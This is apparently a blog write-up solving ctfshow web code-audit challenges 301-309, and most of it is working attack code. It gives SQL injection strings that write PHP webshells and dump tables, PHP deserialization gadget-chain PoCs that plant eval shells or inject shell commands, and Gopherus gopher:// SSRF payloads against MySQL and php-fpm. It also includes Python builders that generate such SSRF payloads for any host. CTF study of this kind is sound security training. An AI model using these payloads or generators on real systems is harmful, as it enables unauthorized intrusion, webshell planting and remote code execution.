ctfshow web intro: code audit 301-309
web301
The username is concatenated directly into the SQL query, so it is injectable; use UNION SELECT ... INTO OUTFILE to drop a shell into the web root:
userid=a' union select "<?php eval($_GET[a]);?>" into outfile "/var/www/html/a.php"%23&userpwd=awd
web302
The change made here does not affect the injection; write the shell exactly as in web301.
web303
If the Lanzou cloud download link will not open, change the s in the domain to x. The insert in dptadd is not filtered, so it is injectable.
dpt.php later queries the inserted data back out, so one field of the injected INSERT can be set to a subquery and its result shows up on the page (a second-order injection).
Log in first with admin / admin, then:
Table names:
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())%23
Column names:
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23
Data:
dpt_name=1',sds_address =(select flag from sds_fl9g)%23
web304
Only the table name changed; same steps as web303.
web305
poc
<?php
class user{
    public $username;   // file name that gets written
    public $password;   // file contents: the webshell
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
}
echo serialize(new user('a.php','<?php eval($_POST[1]);?>'));
web306
index has an unserialize call.
Looking through the included PHP files: in dao.php the __destruct magic method calls $this->conn->close(), and conn is under our control.
class.php, also included, has a log class whose close() method writes a file, so a log object can stand in for conn.
poc
<?php
class log{
    public $title;      // file name written by log::close()
    public $info;       // file contents
    public function __construct(){
        $this->title='a.php';
        $this->info='<?php eval($_POST[1]);?>';
    }
}
class dao{
    private $config;
    private $conn;      // dao::__destruct() calls $this->conn->close()
    public function __construct(){
        $this->conn=new log();
    }
}
// serialized private property names contain NUL bytes; base64 keeps them intact
echo base64_encode(serialize(new dao()));
web307
The unserialize call is in logout.php.
poc
<?php
class config{
    // cache_dir ends up inside a shell command; $ is special in a Linux shell,
    // so it is escaped. The injected command echoes a webshell into a.php.
    public $cache_dir = ';echo "<?php eval(\$_POST[1]);?>" >a.php;';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
web308
The command-execution path is now filtered, but fun.php has an SSRF.
The MySQL account in config still has no password, so use Gopherus (https://github.com/tarunkant/Gopherus) to generate a gopher payload that logs in to MySQL and writes a shell:
poc
<?php
class config{
    // update_url is the URL fetched by the SSRF in fun.php; Gopherus MySQL payload
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%30%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
The deserialization point is in index. The header() redirect there is not followed by exit(), so the code after it still runs; not being logged in does not prevent the unserialize.
Then request the webshell that the query wrote.
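Gopherus hides what the payload above actually is. Here is an added Python example (not from the original post or from Gopherus) that decodes the web308 gopher URL into its MySQL packets and also builds a minimal payload of the same shape. Constant names follow the MySQL client/server protocol documentation; the function names are mine.

```python
from urllib.parse import quote, unquote_to_bytes

# Gopherus payload from the web308 PoC above.
WEB308_URL = "gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%30%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01"

# Client capability flags (MySQL client/server protocol).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_CONNECT_ATTRS = 0x00100000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000
COM_QUIT, COM_QUERY = 0x01, 0x03


def gopher_selector_bytes(url):
    """Bytes the gopher client writes to the socket: the selector after the
    '_' item-type character, percent-decoded (curl appends CRLF, which only
    arrives after COM_QUIT and is ignored)."""
    return unquote_to_bytes(url.split("/_", 1)[1])


def split_mysql_packets(data):
    """MySQL packet: 3-byte little-endian length, 1-byte sequence id, body."""
    packets, i = [], 0
    while i + 4 <= len(data):
        length = int.from_bytes(data[i:i + 3], "little")
        body = data[i + 4:i + 4 + length]
        if len(body) < length:
            raise ValueError("truncated packet at offset %d" % i)
        packets.append((data[i + 3], body))
        i += 4 + length
    return packets


def read_lenenc(buf, pos):
    first = buf[pos]
    if first < 0xFB:
        return first, pos + 1
    width = {0xFC: 2, 0xFD: 3, 0xFE: 8}[first]
    return int.from_bytes(buf[pos + 1:pos + 1 + width], "little"), pos + 1 + width


def read_cstring(buf, pos):
    end = buf.index(b"\0", pos)
    return buf[pos:end].decode(), end + 1


def parse_handshake_response(body):
    """HandshakeResponse41, the client's reply to the server greeting. Through a
    blind SSRF the attacker never sees that greeting, so no challenge response
    can be computed: an empty auth response only works for a passwordless user."""
    caps = int.from_bytes(body[0:4], "little")
    pos = 32                      # caps(4) + max packet(4) + charset(1) + 23 reserved
    user, pos = read_cstring(body, pos)
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        alen, pos = read_lenenc(body, pos)
    elif caps & CLIENT_SECURE_CONNECTION:
        alen, pos = body[pos], pos + 1
    else:
        raise ValueError("pre-4.1 auth layout not handled")
    auth, pos = body[pos:pos + alen], pos + alen
    db = plugin = None
    if caps & CLIENT_CONNECT_WITH_DB:
        db, pos = read_cstring(body, pos)
    if caps & CLIENT_PLUGIN_AUTH:
        plugin, pos = read_cstring(body, pos)
    attrs = {}
    if caps & CLIENT_CONNECT_ATTRS:       # key/value pairs, each length-encoded
        total, pos = read_lenenc(body, pos)
        end = pos + total
        while pos < end:
            klen, pos = read_lenenc(body, pos)
            key, pos = body[pos:pos + klen].decode(), pos + klen
            vlen, pos = read_lenenc(body, pos)
            attrs[key] = body[pos:pos + vlen].decode()
            pos += vlen
    return {"caps": caps, "user": user, "auth": auth, "db": db, "plugin": plugin, "attrs": attrs}


def decode_gopher_mysql(url):
    """Return (login info, [(command name, argument), ...]) for a gopher URL."""
    packets = split_mysql_packets(gopher_selector_bytes(url))
    login = parse_handshake_response(packets[0][1])
    commands = []
    for _seq, body in packets[1:]:
        if body[0] == COM_QUERY:
            commands.append(("COM_QUERY", body[1:].decode()))
        elif body[0] == COM_QUIT:
            commands.append(("COM_QUIT", ""))
        else:
            commands.append(("COM_0x%02x" % body[0], body[1:].hex()))
    return login, commands


def mysql_packet(payload, seq):
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def build_gopher_mysql(host, port, user, query):
    """Minimal equivalent of what Gopherus generates: log in as a passwordless
    account, run one query, quit. The login is sequence id 1 because the unseen
    server greeting was packet 0; each command then starts a new sequence at 0."""
    caps = CLIENT_LONG_PASSWORD | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    login = (caps.to_bytes(4, "little") + (1 << 24).to_bytes(4, "little")
             + bytes([33]) + b"\0" * 23           # charset utf8, 23 reserved bytes
             + user.encode() + b"\0" + b"\0"      # user name, then empty auth response
             + b"mysql_native_password\0")
    raw = (mysql_packet(login, 1)
           + mysql_packet(bytes([COM_QUERY]) + query.encode(), 0)
           + mysql_packet(bytes([COM_QUIT]), 0))
    return "gopher://%s:%d/_%s" % (host, port, quote(raw, safe=""))


if __name__ == "__main__":
    login, commands = decode_gopher_mysql(WEB308_URL)
    print("user=%r auth=%r plugin=%r" % (login["user"], login["auth"], login["plugin"]))
    for name, arg in commands:
        print(name, arg)
```

Decoding the PoC shows a login as root with an empty auth response, a single COM_QUERY doing SELECT ... INTO OUTFILE '/var/www/html/1.php', and COM_QUIT. Besides the missing password, INTO OUTFILE needs the MySQL account to hold the FILE privilege, secure_file_priv must not exclude the target directory, and the mysqld process must be able to write into the web root; any of those failing leaves the SSRF "working" but no shell appearing.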
web309
poc
<?php
class config{
    // Gopherus FastCGI payload aimed at php-fpm on its default port 9000
public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
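The web309 payload targets php-fpm's FastCGI port instead of MySQL. As an added Python example (not from the original post or from Gopherus), the code below decodes the gopher URL above into FastCGI records and parameters, and builds a minimal payload of the same shape; the SCRIPT_FILENAME and other parameter values in the builder are my choices, not the challenge's.

```python
from urllib.parse import quote, unquote_to_bytes

# Gopherus payload from the web309 PoC above.
WEB309_URL = "gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00"

FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def gopher_selector_bytes(url):
    """Percent-decoded selector after the '_' item-type character."""
    return unquote_to_bytes(url.split("/_", 1)[1])


def split_records(data):
    """FastCGI record header: version, type, requestId(2), contentLength(2),
    paddingLength, reserved; then content and padding."""
    records, i = [], 0
    while i + 8 <= len(data):
        rtype = data[i + 1]
        req_id = int.from_bytes(data[i + 2:i + 4], "big")
        clen = int.from_bytes(data[i + 4:i + 6], "big")
        plen = data[i + 6]
        content = data[i + 8:i + 8 + clen]
        if len(content) < clen:
            raise ValueError("truncated record at offset %d" % i)
        records.append((rtype, req_id, content))
        i += 8 + clen + plen
    return records


def read_nv_len(buf, pos):
    """Name/value length: 1 byte if < 128, else 4 bytes big-endian with the top bit set."""
    if buf[pos] < 0x80:
        return buf[pos], pos + 1
    return int.from_bytes(buf[pos:pos + 4], "big") & 0x7FFFFFFF, pos + 4


def parse_params(content):
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = read_nv_len(content, pos)
        vlen, pos = read_nv_len(content, pos)
        name, pos = content[pos:pos + nlen].decode(), pos + nlen
        params[name] = content[pos:pos + vlen].decode()
        pos += vlen
    return params


def decode_gopher_fastcgi(url):
    """Reassemble the request php-fpm would see: role, params and stdin body."""
    result = {"role": None, "params": {}, "stdin": b""}
    for rtype, _req_id, content in split_records(gopher_selector_bytes(url)):
        if rtype == FCGI_BEGIN_REQUEST:
            result["role"] = int.from_bytes(content[0:2], "big")
        elif rtype == FCGI_PARAMS and content:      # empty PARAMS record ends the params
            result["params"].update(parse_params(content))
        elif rtype == FCGI_STDIN:                   # empty STDIN record ends the body
            result["stdin"] += content
    return result


def fcgi_record(rtype, content, req_id=1):
    pad = (-len(content)) % 8                       # pad content to 8 bytes
    header = (bytes([FCGI_VERSION_1, rtype]) + req_id.to_bytes(2, "big")
              + len(content).to_bytes(2, "big") + bytes([pad, 0]))
    return header + content + b"\0" * pad


def encode_param(name, value):
    def enc(n):
        return bytes([n]) if n < 0x80 else (n | 0x80000000).to_bytes(4, "big")
    name, value = name.encode(), value.encode()
    return enc(len(name)) + enc(len(value)) + name + value


def build_gopher_fastcgi(host, port, script_filename, php_code):
    """Same trick as the PoC: PHP_VALUE enables allow_url_include and sets
    auto_prepend_file=php://input, so the POST body is executed before the
    script named by SCRIPT_FILENAME, which must exist on the target.
    disable_functions is PHP_INI_SYSTEM and cannot be changed via PHP_VALUE,
    so the line Gopherus emits for it is deliberately left out."""
    body = php_code.encode()
    params = {
        "REQUEST_METHOD": "POST",
        "SCRIPT_FILENAME": script_filename,
        "CONTENT_LENGTH": str(len(body)),
        "PHP_VALUE": "allow_url_include = On\nauto_prepend_file = php://input",
        "DOCUMENT_ROOT": "/",
    }
    raw = (fcgi_record(FCGI_BEGIN_REQUEST, FCGI_RESPONDER.to_bytes(2, "big") + b"\0" * 6)
           + fcgi_record(FCGI_PARAMS, b"".join(encode_param(k, v) for k, v in params.items()))
           + fcgi_record(FCGI_PARAMS, b"")
           + fcgi_record(FCGI_STDIN, body)
           + fcgi_record(FCGI_STDIN, b""))
    return "gopher://%s:%d/_%s" % (host, port, quote(raw, safe=""))


if __name__ == "__main__":
    req = decode_gopher_fastcgi(WEB309_URL)
    for key, value in req["params"].items():
        print("%s=%r" % (key, value))
    print("stdin:", req["stdin"].decode())
```

Decoding the PoC shows SCRIPT_FILENAME=index.php, a PHP_VALUE that turns on allow_url_include and prepends php://input, and a 58-byte POST body running system('cat f*'). The script name is the part to adapt per target: php-fpm resolves SCRIPT_FILENAME before auto_prepend_file takes effect, so pointing it at a file that does not exist yields "Primary script unknown" and the body never runs.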
http://example.com/2021/06/08/OldBlog/ctfshow-web入门代码审计301-310/